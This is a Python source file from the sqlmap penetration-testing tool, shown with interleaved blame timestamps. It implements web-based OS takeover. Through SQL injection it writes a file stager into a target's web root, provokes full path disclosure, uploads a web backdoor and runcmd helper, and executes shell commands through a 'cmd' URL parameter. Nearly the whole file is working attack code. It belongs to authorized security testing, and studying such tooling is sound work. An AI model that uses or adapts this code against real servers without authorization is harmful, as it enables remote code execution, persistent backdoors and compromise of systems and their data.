2013-02-14 15:32:17 +04:00
|
|
|
#!/usr/bin/env python
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
"""
|
2017-01-02 16:19:18 +03:00
|
|
|
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2010-01-14 17:03:16 +03:00
|
|
|
"""
|
|
|
|
|
|
|
|
import os
|
2015-05-19 19:40:45 +03:00
|
|
|
import posixpath
|
2010-01-14 17:03:16 +03:00
|
|
|
import re
|
2012-12-13 16:19:47 +04:00
|
|
|
import StringIO
|
2015-11-29 00:42:25 +03:00
|
|
|
import tempfile
|
2015-05-19 19:40:45 +03:00
|
|
|
import urlparse
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-01-28 19:56:00 +03:00
|
|
|
from extra.cloak.cloak import decloak
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.agent import agent
|
2012-07-13 13:23:21 +04:00
|
|
|
from lib.core.common import arrayizeValue
|
2011-04-23 20:25:09 +04:00
|
|
|
from lib.core.common import Backend
|
2010-11-24 14:38:27 +03:00
|
|
|
from lib.core.common import extractRegexResult
|
2014-01-13 21:12:37 +04:00
|
|
|
from lib.core.common import getAutoDirectories
|
|
|
|
from lib.core.common import getManualDirectories
|
2012-10-29 13:48:49 +04:00
|
|
|
from lib.core.common import getPublicTypeMembers
|
2012-07-20 19:20:17 +04:00
|
|
|
from lib.core.common import getSQLSnippet
|
2012-10-30 03:37:43 +04:00
|
|
|
from lib.core.common import getUnicode
|
2010-02-04 17:37:00 +03:00
|
|
|
from lib.core.common import ntToPosixSlashes
|
2010-12-15 15:50:56 +03:00
|
|
|
from lib.core.common import isTechniqueAvailable
|
2010-04-22 14:31:33 +04:00
|
|
|
from lib.core.common import isWindowsDriveLetterPath
|
2010-02-03 19:10:09 +03:00
|
|
|
from lib.core.common import normalizePath
|
2017-04-06 12:33:59 +03:00
|
|
|
from lib.core.common import parseFilePaths
|
2010-02-04 17:37:00 +03:00
|
|
|
from lib.core.common import posixToNtSlashes
|
2010-12-05 15:24:23 +03:00
|
|
|
from lib.core.common import randomInt
|
2010-02-25 13:33:41 +03:00
|
|
|
from lib.core.common import randomStr
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.common import readInput
|
2012-07-13 12:35:22 +04:00
|
|
|
from lib.core.common import singleTimeWarnMessage
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.convert import hexencode
|
2012-10-30 04:26:19 +04:00
|
|
|
from lib.core.convert import utf8encode
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import paths
|
2012-07-20 19:20:17 +04:00
|
|
|
from lib.core.enums import DBMS
|
2017-04-06 12:33:59 +03:00
|
|
|
from lib.core.enums import HTTP_HEADER
|
2011-04-23 20:25:09 +04:00
|
|
|
from lib.core.enums import OS
|
2011-02-02 16:34:09 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2017-04-06 12:33:59 +03:00
|
|
|
from lib.core.enums import PLACE
|
2012-10-29 13:48:49 +04:00
|
|
|
from lib.core.enums import WEB_API
|
2014-06-29 02:27:23 +04:00
|
|
|
from lib.core.exception import SqlmapNoneDataException
|
2013-03-19 22:24:14 +04:00
|
|
|
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
|
2012-10-29 13:48:49 +04:00
|
|
|
from lib.core.settings import EVENTVALIDATION_REGEX
|
|
|
|
from lib.core.settings import VIEWSTATE_REGEX
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.request.connect import Connect as Request
|
2014-08-21 03:12:44 +04:00
|
|
|
from thirdparty.oset.pyoset import oset
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
|
|
|
|
class Web:
|
|
|
|
"""
|
|
|
|
This class defines web-oriented OS takeover functionalities for
|
|
|
|
plugins.
|
|
|
|
"""
|
|
|
|
|
|
|
|
def __init__(self):
|
2011-04-30 17:20:05 +04:00
|
|
|
self.webApi = None
|
|
|
|
self.webBaseUrl = None
|
2010-01-14 17:03:16 +03:00
|
|
|
self.webBackdoorUrl = None
|
2012-07-11 17:08:51 +04:00
|
|
|
self.webBackdoorFilePath = None
|
2011-04-30 17:20:05 +04:00
|
|
|
self.webStagerUrl = None
|
2012-07-11 17:08:51 +04:00
|
|
|
self.webStagerFilePath = None
|
2011-04-30 17:20:05 +04:00
|
|
|
self.webDirectory = None
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-01-14 17:33:08 +03:00
|
|
|
def webBackdoorRunCmd(self, cmd):
    """
    Runs the given command through the uploaded web backdoor and returns
    its textual output (the content of the page's <pre> element), or
    None if no backdoor is available or no output could be extracted.
    """

    if self.webBackdoorUrl is None:
        return

    result = None
    command = cmd or conf.osCmd  # fall back to the user-provided --os-cmd value

    url = "%s?cmd=%s" % (self.webBackdoorUrl, command)
    page, _, _ = Request.getPage(url=url, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)

    if page is not None:
        match = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
        if match:
            result = match.group(1)

    return result
|
|
|
|
|
2012-12-13 16:19:47 +04:00
|
|
|
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
    """
    Uploads a file to the given remote directory through the web file
    stager. The payload can be supplied as an already-open stream, as
    raw content, or as a local file path (paths ending with '_' hold
    cloaked files and are decloaked first).
    """

    if filepath is not None:
        if filepath.endswith('_'):
            # cloaked file on disk
            content = decloak(filepath)
        else:
            with open(filepath, "rb") as source:
                content = source.read()

    # raw content (possibly just read/decloaked above) wins over a
    # caller-provided stream
    stream = StringIO.StringIO(content) if content is not None else stream

    return self._webFileStreamUpload(stream, destFileName, directory)
|
2010-01-28 20:07:34 +03:00
|
|
|
|
2012-12-06 17:14:19 +04:00
|
|
|
def _webFileStreamUpload(self, stream, destFileName, directory):
    """
    Uploads the given file-like object through the web file stager
    (multipart POST against self.webStagerUrl) as 'destFileName' into
    the remote 'directory'. Returns True on success, False otherwise.
    """

    stream.seek(0)  # Rewind

    # File-like objects built from raw strings have no writable 'name';
    # set it when possible so the multipart part carries the filename
    try:
        setattr(stream, "name", destFileName)
    except TypeError:
        pass

    if self.webApi in getPublicTypeMembers(WEB_API, True):
        multipartParams = {
            "upload": "1",
            "file": stream,
            "uploadDir": directory,
        }

        if self.webApi == WEB_API.ASPX:
            # ASP.NET form tokens previously harvested by webInit() (note:
            # the double-underscore attributes are name-mangled identically
            # in both places, as both live inside this class)
            multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
            multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE

        page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)

        # page can be None when the request fails (raise404=False);
        # guard before the substring check to avoid a TypeError
        if "File uploaded" not in (page or ""):
            warnMsg = "unable to upload the file through the web file "
            warnMsg += "stager to '%s'" % directory
            logger.warn(warnMsg)
            return False
        else:
            return True
    else:
        logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi)
        return False
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2012-12-06 17:14:19 +04:00
|
|
|
def _webFileInject(self, fileContent, fileName, directory):
    """
    Writes the given content to 'directory/fileName' on the remote file
    system by injecting a MySQL file-write ("write_file_limit") query.
    Returns the page resulting from the injected request.
    """

    outFile = posixpath.join(ntToPosixSlashes(directory), fileName)

    # Windows paths inside the written file need escaped backslashes
    writableDir = directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory
    uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", writableDir)

    prefix = ""

    # When the current injection point uses a NEGATIVE 'where' context,
    # prepend an always-true OR predicate
    if isTechniqueAvailable(kb.technique):
        if kb.injection.data[kb.technique].where == PAYLOAD.WHERE.NEGATIVE:
            randInt = randomInt()
            prefix = "OR %d=%d " % (randInt, randInt)

    query = prefix + getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
    query = agent.suffixQuery(agent.prefixQuery(query))

    return Request.queryPage(agent.payload(newValue=query))
|
2010-02-16 16:20:34 +03:00
|
|
|
|
2010-01-14 17:03:16 +03:00
|
|
|
def webInit(self):
    """
    This method is used to write a web backdoor (agent) on a writable
    remote directory within the web server document root.
    """

    # Nothing to do if a previous call already established everything
    if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
        return

    self.checkDbmsOs()

    # Ask the user which web application language the server supports,
    # pre-selecting a default guessed from the target URL's extension
    default = None
    choices = list(getPublicTypeMembers(WEB_API, True))

    for ext in choices:
        if conf.url.endswith(ext):
            default = ext
            break

    if not default:
        # No hint from the URL: guess from the detected back-end OS
        default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP

    message = "which web application language does the web server "
    message += "support?\n"

    for count in xrange(len(choices)):
        ext = choices[count]
        message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))

        if default == ext:
            # From here on 'default' holds the 1-based menu number
            default = count + 1

    message = message[:-1]

    while True:
        choice = readInput(message, default=str(default))

        if not choice.isdigit():
            logger.warn("invalid value, only digits are allowed")

        elif int(choice) < 1 or int(choice) > len(choices):
            logger.warn("invalid value, it must be between 1 and %d" % len(choices))

        else:
            self.webApi = choices[int(choice) - 1]
            break

    # If no absolute server-side file paths were harvested so far,
    # optionally try a few tricks to provoke a full path disclosure;
    # any paths found in the responses are collected by parseFilePaths()
    if not kb.absFilePaths:
        message = "do you want sqlmap to further try to "
        message += "provoke the full path disclosure? [Y/n] "

        if readInput(message, default='Y', boolean=True):
            headers = {}
            been = set([conf.url])

            # Trick #1: for WordPress-looking pages, request
            # wp-content/wp-db.php directly (presumably triggers an error
            # page containing absolute paths - harvested below)
            for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
                url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
                if url not in been:
                    try:
                        page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
                        parseFilePaths(page)
                    except:
                        pass
                    finally:
                        been.add(url)

            # Trick #2: request a backup-style variant of the target URL
            # (e.g. "script.php" -> "script~.php")
            url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url)
            if url not in been:
                try:
                    page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
                    parseFilePaths(page)
                except:
                    pass
                finally:
                    been.add(url)

            # Trick #3: turn scalar GET/POST parameters into arrays
            # (e.g. "id=" -> "id[]=")
            for place in (PLACE.GET, PLACE.POST):
                if place in conf.parameters:
                    value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
                    if "[]" in value:
                        page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
                        parseFilePaths(page)

            # Pick a cookie either from the request parameters or from the
            # Set-Cookie response header captured in Trick #3
            cookie = None
            if PLACE.COOKIE in conf.parameters:
                cookie = conf.parameters[PLACE.COOKIE]
            elif headers and HTTP_HEADER.SET_COOKIE in headers:
                cookie = headers[HTTP_HEADER.SET_COOKIE]

            if cookie:
                # Trick #4: replay the request with oversized and then
                # emptied cookie values
                value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
                if value != cookie:
                    page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
                    parseFilePaths(page)

                value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
                if value != cookie:
                    page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
                    parseFilePaths(page)

    # Candidate writable directories: user-provided ones first, then the
    # automatic guesses; oset() deduplicates while preserving order
    directories = list(arrayizeValue(getManualDirectories()))
    directories.extend(getAutoDirectories())
    directories = list(oset(directories))

    # For each candidate also try candidate + <URL path> as subdirectory
    path = urlparse.urlparse(conf.url).path or '/'
    if path != '/':
        _ = []
        for directory in directories:
            _.append(directory)
            if not directory.endswith(path):
                _.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
        directories = _

    backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
    backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))

    stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))

    for directory in directories:
        if not directory:
            continue

        stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
        self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

        uploaded = False
        directory = ntToPosixSlashes(normalizePath(directory))

        # Normalize to an absolute, '/'-terminated directory path
        if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
            directory = "/%s" % directory

        if not directory.endswith('/'):
            directory += '/'

        # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
        infoMsg = "trying to upload the file stager on '%s' " % directory
        infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
        logger.info(infoMsg)
        self._webFileInject(stagerContent, stagerName, directory)

        # The document root is unknown: probe every suffix of the file
        # system directory path as a candidate URL path to the stager
        for match in re.finditer('/', directory):
            self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
            self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
            debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
            logger.debug(debugMsg)

            uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
            uplPage = uplPage or ""

            if "sqlmap file uploader" in uplPage:
                uploaded = True
                break

        # Fall-back to UNION queries file upload method
        if not uploaded:
            warnMsg = "unable to upload the file stager "
            warnMsg += "on '%s'" % directory
            singleTimeWarnMessage(warnMsg)

            if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                infoMsg = "trying to upload the file stager on '%s' " % directory
                infoMsg += "via UNION method"
                logger.info(infoMsg)

                stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
                self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

                # Materialize the stager into a local temporary file so
                # that unionWriteFile() can transfer it
                handle, filename = tempfile.mkstemp()
                os.close(handle)

                with open(filename, "w+b") as f:
                    _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
                    _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
                    f.write(_)

                self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)

                # Same URL probing as above for the UNION-written stager
                for match in re.finditer('/', directory):
                    self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
                    self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)

                    debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
                    logger.debug(debugMsg)

                    uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
                    uplPage = uplPage or ""

                    if "sqlmap file uploader" in uplPage:
                        uploaded = True
                        break

        if not uploaded:
            continue

        # Raw script markers in the response mean the server served the
        # stager source without executing it - useless, try next directory
        if "<%" in uplPage or "<?" in uplPage:
            warnMsg = "file stager uploaded on '%s', " % directory
            warnMsg += "but not dynamically interpreted"
            logger.warn(warnMsg)
            continue

        elif self.webApi == WEB_API.ASPX:
            # Store the ASP.NET form tokens required by later multipart
            # POSTs against the stager (see _webFileStreamUpload())
            kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
            kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)

        infoMsg = "the file stager has been successfully uploaded "
        infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
        logger.info(infoMsg)

        if self.webApi == WEB_API.ASP:
            # ASP case: the stager page reports a writable scripts
            # directory; upload the backdoor and a runcmd.exe helper there
            match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)

            if match:
                backdoorDirectory = match.group(1)
            else:
                continue

            _ = "tmpe%s.exe" % randomStr(lowercase=True)
            if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
                self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_"))
                self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
                self.webDirectory = backdoorDirectory
            else:
                continue

        else:
            # Other web APIs: upload the backdoor through the stager, and
            # on failure optionally retry with the SQL file-write method
            if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
                warnMsg = "backdoor has not been successfully uploaded "
                warnMsg += "through the file stager possibly because "
                warnMsg += "the user running the web server process "
                warnMsg += "has not write privileges over the folder "
                warnMsg += "where the user running the DBMS process "
                warnMsg += "was able to upload the file stager or "
                warnMsg += "because the DBMS and web server sit on "
                warnMsg += "different servers"
                logger.warn(warnMsg)

                message = "do you want to try the same method used "
                message += "for the file stager? [Y/n] "

                if readInput(message, default='Y', boolean=True):
                    self._webFileInject(backdoorContent, backdoorName, directory)
                else:
                    continue

            self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
            self.webDirectory = directory

        self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)

        # Smoke-test the backdoor with a simple echo command
        testStr = "command execution test"
        output = self.webBackdoorRunCmd("echo %s" % testStr)

        if output == "0":
            warnMsg = "the backdoor has been uploaded but required privileges "
            warnMsg += "for running the system commands are missing"
            raise SqlmapNoneDataException(warnMsg)
        elif output and testStr in output:
            infoMsg = "the backdoor has been successfully "
        else:
            infoMsg = "the backdoor has probably been successfully "

        infoMsg += "uploaded on '%s' - " % self.webDirectory
        infoMsg += self.webBackdoorUrl
        logger.info(infoMsg)

        break
|